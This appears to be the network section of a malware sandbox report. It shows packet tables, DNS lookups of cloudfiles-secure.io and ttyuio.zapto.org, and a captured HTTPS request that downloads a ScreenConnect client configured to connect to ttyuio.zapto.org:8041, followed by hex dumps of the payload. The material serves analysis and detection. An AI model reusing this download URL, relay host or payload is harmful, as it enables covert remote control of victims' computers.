                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.289364100 CEST49743443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.289391994 CEST44349743178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.289407015 CEST49743443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.289438963 CEST49743443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.297559977 CEST44349743178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.297581911 CEST44349743178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.297676086 CEST49743443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.297699928 CEST44349743178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.297897100 CEST44349743178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.297916889 CEST44349743178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.297957897 CEST49743443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.297966003 CEST44349743178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.297983885 CEST49743443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.298010111 CEST49743443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.298446894 CEST44349743178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.298464060 CEST44349743178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.298522949 CEST49743443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.298531055 CEST44349743178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.298701048 CEST44349743178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.298722029 CEST44349743178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.298727036 CEST49743443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.298736095 CEST44349743178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.298765898 CEST49743443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.298810005 CEST49743443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.299253941 CEST44349743178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.299271107 CEST44349743178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.299319029 CEST49743443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.299325943 CEST44349743178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.299591064 CEST44349743178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.299612999 CEST44349743178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.299627066 CEST49743443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.299635887 CEST44349743178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.299655914 CEST49743443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.299685001 CEST49743443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.300157070 CEST44349743178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.300173044 CEST44349743178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.300230026 CEST49743443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.300237894 CEST44349743178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.300288916 CEST49743443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.378218889 CEST44349743178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.378251076 CEST44349743178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.378374100 CEST49743443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.378426075 CEST44349743178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.378757954 CEST49743443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.386138916 CEST44349743178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.386174917 CEST44349743178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.386282921 CEST49743443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.386296988 CEST44349743178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.386339903 CEST49743443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.386493921 CEST44349743178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.386511087 CEST44349743178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.386543989 CEST49743443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.386550903 CEST44349743178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.386579990 CEST49743443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.386593103 CEST49743443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.386950016 CEST44349743178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.386970043 CEST44349743178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.387006998 CEST49743443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.387015104 CEST44349743178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.387041092 CEST49743443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.387054920 CEST49743443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.387087107 CEST44349743178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.387145042 CEST49743443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.387151003 CEST44349743178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.387232065 CEST44349743178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.387284040 CEST49743443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:13.387640953 CEST49743443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:16.583831072 CEST497458041192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:16.588741064 CEST804149745178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:16.588850975 CEST497458041192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:17.867309093 CEST497458041192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:17.872281075 CEST804149745178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:18.053077936 CEST804149745178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:18.090776920 CEST497458041192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:18.095711946 CEST804149745178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:18.276248932 CEST804149745178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:18.325124025 CEST497458041192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:48.293978930 CEST497458041192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:48.299031973 CEST804149745178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:48.479501009 CEST804149745178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:48.528273106 CEST497458041192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:24:18.496906042 CEST497458041192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:24:18.501885891 CEST804149745178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:24:18.697877884 CEST804149745178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:24:18.746805906 CEST497458041192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:24:18.788322926 CEST804149745178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:24:18.840564966 CEST497458041192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:24:19.417217016 CEST497458041192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:24:19.417295933 CEST497458041192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:24:19.449960947 CEST497458041192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:24:19.520488024 CEST804149745178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:24:19.520512104 CEST804149745178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:24:19.520519972 CEST804149745178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:24:19.520526886 CEST804149745178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:24:19.520535946 CEST804149745178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:24:19.520544052 CEST804149745178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:24:19.520751953 CEST804149745178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:24:31.190004110 CEST804149745178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:24:31.200234890 CEST497458041192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:24:31.205081940 CEST804149745178.215.236.119192.168.2.5

                                                                                                                                                                                                                                                                        UDP Packets

                                                                                                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:22:51.301331043 CEST6435353192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:22:51.390146017 CEST53643531.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:16.533320904 CEST5154253192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:16.542222023 CEST53515421.1.1.1192.168.2.5

                                                                                                                                                                                                                                                                        DNS Queries

                                                                                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:22:51.301331043 CEST192.168.2.51.1.1.10xa9a4Standard query (0)cloudfiles-secure.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:16.533320904 CEST192.168.2.51.1.1.10xcb4aStandard query (0)ttyuio.zapto.orgA (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                                        DNS Answers

                                                                                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:22:51.390146017 CEST1.1.1.1192.168.2.50xa9a4No error (0)cloudfiles-secure.io178.215.236.119A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:22:55.590727091 CEST1.1.1.1192.168.2.50x2798No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:22:55.590727091 CEST1.1.1.1192.168.2.50x2798No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:22:55.595554113 CEST1.1.1.1192.168.2.50x2962No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:22:55.595554113 CEST1.1.1.1192.168.2.50x2962No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:16.542222023 CEST1.1.1.1192.168.2.50xcb4aNo error (0)ttyuio.zapto.org178.215.236.119A (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                                        HTTP Request Dependency Graph

                                                                                                                                                                                                                                                                        • cloudfiles-secure.io

                                                                                                                                                                                                                                                                        HTTPS Proxied Packets

                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        0192.168.2.549705178.215.236.1194431196C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-10-02 04:22:52 UTC633OUTGET /Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=ttyuio.zapto.org&p=8041&s=73549b67-726b-470e-ab1a-fbbb83a6a15b&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Untitled%20Session HTTP/1.1
                                                                                                                                                                                                                                                                        Host: cloudfiles-secure.io
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        2024-10-02 04:22:53 UTC251INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Cache-Control: private
                                                                                                                                                                                                                                                                        Content-Length: 242016
                                                                                                                                                                                                                                                                        Content-Type: application/x-ms-application; charset=utf-8
                                                                                                                                                                                                                                                                        Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                        Date: Wed, 02 Oct 2024 04:22:52 GMT
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        2024-10-02 04:22:53 UTC16133INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 61 73 6d 76 31 3a 61 73 73 65 6d 62 6c 79 20 78 73 69 3a 73 63 68 65 6d 61 4c 6f 63 61 74 69 6f 6e 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 31 20 61 73 73 65 6d 62 6c 79 2e 61 64 61 70 74 69 76 65 2e 78 73 64 22 20 6d 61 6e 69 66 65 73 74 56 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 78 6d 6c 6e 73 3a 61 73 6d 76 31 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 31 22 20 78 6d 6c 6e 73 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 32 22 20 78 6d 6c 6e 73 3a 61 73 6d 76 32 3d
                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2=
                                                                                                                                                                                                                                                                        2024-10-02 04:22:53 UTC16384INData Raw: 47 6c 69 52 47 38 79 66 59 52 6f 64 77 71 45 6c 46 44 4c 68 4b 54 47 45 6b 53 6b 48 75 45 45 6c 4f 31 6d 42 49 59 67 77 51 54 4d 39 72 37 45 35 69 6e 4a 52 53 58 55 49 59 55 79 31 33 46 46 43 58 6b 4e 52 56 67 42 49 49 56 64 59 61 51 46 57 34 36 48 68 59 43 77 4a 63 57 48 61 72 43 46 67 30 41 33 42 5a 69 6a 54 45 5a 37 35 39 53 47 39 4a 2f 42 78 37 6a 76 49 67 65 76 55 2b 52 48 6d 39 47 32 52 37 6f 79 66 6f 65 77 58 79 75 48 77 39 4f 45 53 42 36 7a 43 6f 67 4a 72 39 62 49 45 39 4b 4f 79 46 4a 6c 31 59 68 45 58 59 63 49 74 50 52 58 43 4c 58 66 4a 4d 69 37 52 32 79 49 75 4c 43 75 53 4b 59 33 42 51 6a 4e 43 7a 2b 49 2f 2b 4a 57 79 52 67 6f 57 67 6b 77 6a 5a 75 4a 47 48 4c 62 69 51 6a 30 32 38 6b 68 48 35 7a 4a 4c 4a 32 74 43 54 42 31 6d 59 6c 66 59 4e 57 4a
                                                                                                                                                                                                                                                                        Data Ascii: GliRG8yfYRodwqElFDLhKTGEkSkHuEElO1mBIYgwQTM9r7E5inJRSXUIYUy13FFCXkNRVgBIIVdYaQFW46HhYCwJcWHarCFg0A3BZijTEZ759SG9J/Bx7jvIgevU+RHm9G2R7oyfoewXyuHw9OESB6zCogJr9bIE9KOyFJl1YhEXYcItPRXCLXfJMi7R2yIuLCuSKY3BQjNCz+I/+JWyRgoWgkwjZuJGHLbiQj028khH5zJLJ2tCTB1mYlfYNWJ
                                                                                                                                                                                                                                                                        2024-10-02 04:22:53 UTC16384INData Raw: 55 41 62 41 42 4e 41 47 45 41 62 67 42 68 41 47 63 41 5a 51 42 44 41 48 49 41 5a 51 42 6b 41 47 55 41 62 67 42 30 41 47 6b 41 59 51 42 73 41 48 4d 41 52 41 42 6c 41 48 4d 41 59 77 42 79 41 47 6b 41 63 41 42 30 41 47 6b 41 62 77 42 75 41 43 49 4e 41 41 42 45 51 77 42 76 41 47 34 41 64 41 42 79 41 47 38 41 62 41 42 51 41 47 45 41 62 67 42 6c 41 47 77 41 54 51 42 68 41 47 34 41 59 51 42 6e 41 47 55 41 51 77 42 79 41 47 55 41 5a 41 42 6c 41 47 34 41 64 41 42 70 41 47 45 41 62 41 42 7a 41 46 51 41 61 51 42 30 41 47 77 41 5a 51 42 5a 44 51 41 41 54 45 4d 41 62 77 42 75 41 48 51 41 63 67 42 76 41 47 77 41 55 41 42 68 41 47 34 41 5a 51 42 73 41 45 30 41 59 51 42 75 41 47 45 41 5a 77 42 6c 41 46 41 41 5a 51 42 79 41 48 4d 41 62 77 42 75 41 47 45 41 62 41 42 55 41
                                                                                                                                                                                                                                                                        Data Ascii: UAbABNAGEAbgBhAGcAZQBDAHIAZQBkAGUAbgB0AGkAYQBsAHMARABlAHMAYwByAGkAcAB0AGkAbwBuACINAABEQwBvAG4AdAByAG8AbABQAGEAbgBlAGwATQBhAG4AYQBnAGUAQwByAGUAZABlAG4AdABpAGEAbABzAFQAaQB0AGwAZQBZDQAATEMAbwBuAHQAcgBvAGwAUABhAG4AZQBsAE0AYQBuAGEAZwBlAFAAZQByAHMAbwBuAGEAbABUA
                                                                                                                                                                                                                                                                        2024-10-02 04:22:53 UTC16384INData Raw: 41 41 5a 51 42 79 41 47 30 41 61 51 42 7a 41 48 4d 41 61 51 42 76 41 47 34 41 63 77 42 45 41 47 6b 41 59 51 42 73 41 47 38 41 5a 77 42 55 41 47 55 41 65 41 42 30 41 45 4d 41 62 77 42 75 41 48 51 41 5a 51 42 75 41 48 51 41 52 67 42 76 41 48 49 41 62 51 42 68 41 48 51 41 65 79 30 41 41 45 35 4e 41 47 45 41 59 77 42 4a 41 47 34 41 63 77 42 30 41 48 49 41 64 51 42 6a 41 48 51 41 61 51 42 76 41 47 34 41 59 51 42 73 41 45 51 41 61 51 42 68 41 47 77 41 62 77 42 6e 41 45 51 41 61 51 42 7a 41 47 30 41 61 51 42 7a 41 48 4d 41 51 67 42 31 41 48 51 41 64 41 42 76 41 47 34 41 56 41 42 6c 41 48 67 41 64 41 43 4b 4d 51 41 41 51 6b 30 41 59 51 42 6a 41 46 49 41 5a 51 42 70 41 47 34 41 63 77 42 30 41 47 45 41 62 41 42 73 41 46 55 41 62 67 42 70 41 47 34 41 63 77 42 30 41
                                                                                                                                                                                                                                                                        Data Ascii: AAZQByAG0AaQBzAHMAaQBvAG4AcwBEAGkAYQBsAG8AZwBUAGUAeAB0AEMAbwBuAHQAZQBuAHQARgBvAHIAbQBhAHQAey0AAE5NAGEAYwBJAG4AcwB0AHIAdQBjAHQAaQBvAG4AYQBsAEQAaQBhAGwAbwBnAEQAaQBzAG0AaQBzAHMAQgB1AHQAdABvAG4AVABlAHgAdACKMQAAQk0AYQBjAFIAZQBpAG4AcwB0AGEAbABsAFUAbgBpAG4AcwB0A
                                                                                                                                                                                                                                                                        2024-10-02 04:22:53 UTC16384INData Raw: 4e 6f 62 32 39 7a 5a 53 42 33 61 47 6c 6a 61 43 42 73 62 32 64 76 62 69 42 7a 5a 58 4e 7a 61 57 39 75 49 48 52 76 49 47 4e 76 62 6e 52 79 62 32 77 67 62 32 34 67 64 47 68 6c 49 48 4a 6c 62 57 39 30 5a 53 42 74 59 57 4e 6f 61 57 35 6c 4c 67 45 55 55 32 56 73 5a 57 4e 30 49 45 78 76 5a 32 39 75 49 46 4e 6c 63 33 4e 70 62 32 34 42 45 56 4e 6c 62 47 56 6a 64 43 42 4e 61 57 4e 79 62 33 42 6f 62 32 35 6c 41 53 74 44 61 47 39 76 63 32 55 67 62 32 35 6c 49 47 39 79 49 47 31 76 63 6d 55 67 63 6d 56 74 62 33 52 6c 49 47 31 76 62 6d 6c 30 62 33 4a 7a 49 48 52 76 49 48 5a 70 5a 58 63 75 41 51 39 54 5a 57 78 6c 59 33 51 67 54 57 39 75 61 58 52 76 63 6e 4d 42 52 6b 4e 6f 62 32 39 7a 5a 53 42 68 49 47 78 76 64 32 56 79 49 48 46 31 59 57 78 70 64 48 6b 67 61 57 59 67 62
                                                                                                                                                                                                                                                                        Data Ascii: Nob29zZSB3aGljaCBsb2dvbiBzZXNzaW9uIHRvIGNvbnRyb2wgb24gdGhlIHJlbW90ZSBtYWNoaW5lLgEUU2VsZWN0IExvZ29uIFNlc3Npb24BEVNlbGVjdCBNaWNyb3Bob25lAStDaG9vc2Ugb25lIG9yIG1vcmUgcmVtb3RlIG1vbml0b3JzIHRvIHZpZXcuAQ9TZWxlY3QgTW9uaXRvcnMBRkNob29zZSBhIGxvd2VyIHF1YWxpdHkgaWYgb
                                                                                                                                                                                                                                                                        2024-10-02 04:22:53 UTC16384INData Raw: 47 6c 6a 53 32 56 35 56 47 39 72 5a 57 34 39 59 6a 63 33 59 54 56 6a 4e 54 59 78 4f 54 4d 30 5a 54 41 34 4f 53 4e 54 65 58 4e 30 5a 57 30 75 55 6d 56 7a 62 33 56 79 59 32 56 7a 4c 6c 4a 31 62 6e 52 70 62 57 56 53 5a 58 4e 76 64 58 4a 6a 5a 56 4e 6c 64 41 49 41 41 41 41 44 41 41 41 41 41 41 41 41 41 46 42 42 52 46 42 42 52 46 42 41 56 47 2b 72 76 36 4e 75 58 31 45 79 56 48 31 61 41 41 41 41 4e 51 41 41 41 41 41 41 41 41 42 6a 41 51 41 41 4d 45 45 41 63 41 42 77 41 47 77 41 61 51 42 6a 41 47 45 41 64 41 42 70 41 47 38 41 62 67 42 45 41 47 6b 41 63 67 42 6c 41 47 4d 41 64 41 42 76 41 48 49 41 65 51 42 4f 41 47 45 41 62 51 42 6c 41 41 41 41 41 41 41 67 51 51 42 77 41 48 41 41 62 41 42 70 41 47 4d 41 59 51 42 30 41 47 6b 41 62 77 42 75 41 46 51 41 61 51 42 30
                                                                                                                                                                                                                                                                        Data Ascii: GljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OSNTeXN0ZW0uUmVzb3VyY2VzLlJ1bnRpbWVSZXNvdXJjZVNldAIAAAADAAAAAAAAAFBBRFBBRFBAVG+rv6NuX1EyVH1aAAAANQAAAAAAAABjAQAAMEEAcABwAGwAaQBjAGEAdABpAG8AbgBEAGkAcgBlAGMAdABvAHIAeQBOAGEAbQBlAAAAAAAgQQBwAHAAbABpAGMAYQB0AGkAbwBuAFQAaQB0
                                                                                                                                                                                                                                                                        2024-10-02 04:22:53 UTC16384INData Raw: 6b 67 46 34 46 31 57 64 75 78 6e 77 71 53 2b 32 38 70 45 69 6a 37 50 45 59 6e 69 39 72 6c 58 50 65 38 7a 30 6b 49 4f 6b 31 53 51 39 52 4b 30 39 47 68 69 43 73 4a 38 4d 69 71 68 48 6f 6b 50 4b 69 45 68 79 31 58 77 66 41 76 72 39 65 45 68 78 4e 34 65 44 69 72 65 65 42 78 33 71 31 33 63 62 49 41 48 42 42 68 4a 67 75 4b 75 56 71 74 31 69 78 6e 66 74 72 58 35 48 78 68 6d 52 62 72 46 4d 6b 65 71 41 51 5a 77 2f 6b 4a 5a 42 51 5a 58 67 6c 51 71 58 52 30 62 45 4c 46 79 35 42 48 49 68 75 43 47 64 70 6f 46 46 69 68 5a 42 42 63 49 74 37 2f 4f 48 2f 44 35 56 6f 54 65 47 7a 69 2b 4d 48 77 41 43 34 66 50 4d 42 5a 7a 39 2b 41 42 77 34 61 42 30 44 34 74 4a 63 56 43 5a 56 41 78 57 42 53 4f 47 53 66 39 51 54 64 4b 36 6c 75 31 51 32 59 64 33 2f 79 51 37 59 50 57 55 6c 42 70
                                                                                                                                                                                                                                                                        Data Ascii: kgF4F1WduxnwqS+28pEij7PEYni9rlXPe8z0kIOk1SQ9RK09GhiCsJ8MiqhHokPKiEhy1XwfAvr9eEhxN4eDireeBx3q13cbIAHBBhJguKuVqt1ixnftrX5HxhmRbrFMkeqAQZw/kJZBQZXglQqXR0bELFy5BHIhuCGdpoFFihZBBcIt7/OH/D5VoTeGzi+MHwAC4fPMBZz9+ABw4aB0D4tJcVCZVAxWBSOGSf9QTdK6lu1Q2Yd3/yQ7YPWUlBp
                                                                                                                                                                                                                                                                        2024-10-02 04:22:53 UTC16384INData Raw: 7a 61 55 39 50 53 44 41 73 65 44 68 41 51 63 71 52 37 4d 56 31 65 7a 48 67 44 50 63 2f 68 4d 58 55 32 4e 69 4b 79 66 66 66 41 62 39 7a 4d 79 59 6e 43 65 56 64 46 65 32 57 45 70 58 75 44 54 4b 5a 70 47 69 6d 72 55 4d 31 30 76 50 62 62 62 5a 56 31 2b 52 70 44 5a 46 69 6f 45 4c 65 39 5a 6a 6d 34 7a 6c 49 51 63 51 30 4a 55 4e 43 75 42 30 4b 4c 55 2b 58 41 44 41 52 7a 56 45 4b 6f 6a 55 55 53 42 44 4d 42 78 4c 73 58 48 43 71 4f 44 4a 47 42 54 47 50 50 62 68 52 5a 72 47 49 79 79 63 6a 49 34 72 33 6a 45 5a 41 42 32 74 55 46 31 2b 39 58 44 42 4a 57 49 68 55 6f 6d 4c 2f 43 4c 51 4a 39 63 77 76 5a 50 6c 4f 66 69 75 7a 44 2f 50 61 6d 74 4f 6d 78 63 77 49 4b 58 52 79 6d 55 33 57 71 51 58 78 59 30 38 55 35 56 57 4c 55 41 42 31 58 69 61 6d 50 4d 52 6f 58 5a 45 45 65 67
